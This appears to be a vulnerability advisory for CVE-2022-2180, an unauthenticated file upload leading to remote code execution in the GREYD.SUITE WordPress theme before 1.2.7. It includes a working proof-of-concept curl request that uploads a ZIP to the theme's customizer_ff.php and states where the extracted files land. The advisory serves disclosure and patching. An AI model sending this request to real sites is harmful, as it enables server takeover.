Lucene search
Bernhard KauWPEX-ID:C330F92B-1E21-414F-B316-D5E97CB62BD1HistoryJul 21, 2022 - 12:00 a.m.
GREYD.SUITE < 1.2.7 - Unauthenticated File Upload to RCE
2022-07-2100:00:00
Bernhard Kau
88
0.005 Low
EPSS
Percentile
77.1%
The plugin does not properly validate uploaded custom font packages, and does not perform any authorization or csrf checks, allowing an unauthenticated attacker to upload arbitrary files including php source files, leading to possible remote code execution (RCE). Version 1.2.5 added CSRF checks
Send a POST requests against the wp-content/themes/greyd_suite/inc/customizer_ff.php file with some POST params and a ZIP file containing a CSS file and any other content:
curl --location --request POST 'https://theme-tests.docker.test/wp-content/themes/greyd_suite/inc/customizer_ff.php' \
--form 'mode="upload"' \
--form 'uploadpath="hackpath"' \
--form 'name_full="hackname"' \
--form '[email protected];type=application/zip'
This will extract the files into wp-content/themes/greyd_suite/inc/hackpath/hack/ without any checks of the files included in the ZIP file.
From version 1.2.5, the uploaded files will be found in wp-content/uploads/greyd_tp/custom_fonts/hack/Related
wpvulndb
wpvulndb
GREYD.SUITE < 1.2.7 - Unauthenticated File Upload to RCE
2022-07-21 00:00:00
nvd
nvd
CVE-2022-2180
2022-08-15 11:21:17
patchstack
patchstack
cvelist
cvelist
CVE-2022-2180 GREYD.SUITE < 1.2.7 - Unauthenticated File Upload to RCE
2022-08-15 08:36:24
cve
cve
CVE-2022-2180
2022-08-15 11:21:17
prion
prion
Cross site request forgery (csrf)
2022-08-15 11:21:00